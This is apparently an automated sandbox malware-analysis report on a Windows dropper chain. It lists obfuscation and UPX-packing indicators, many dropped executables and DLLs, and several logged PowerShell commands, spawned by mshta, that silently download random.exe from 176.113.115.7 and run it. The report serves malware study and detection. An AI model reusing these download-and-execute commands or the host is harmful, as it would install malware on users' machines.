                                      Source: cronikxqqq[1].exe.15.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                                      Source: cronikxqqq.exe.15.dr, GSKpiUyewQVjl3ll2g.csHigh entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1
                                      Source: initial sampleStatic PE information: section name: UPX0
                                      Source: initial sampleStatic PE information: section name: UPX1

                                      Persistence and Installation Behavior

                                      barindex
                                      Tries to download and execute files (via powershell)
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\_win32sysloader.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\mfc140u.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32api.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXEJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\win32ui.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_elementtree.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32trace.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-8.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\trano1221[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140_1.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10019520101\dw.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pythoncom311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pywintypes311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\ucrtbase.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
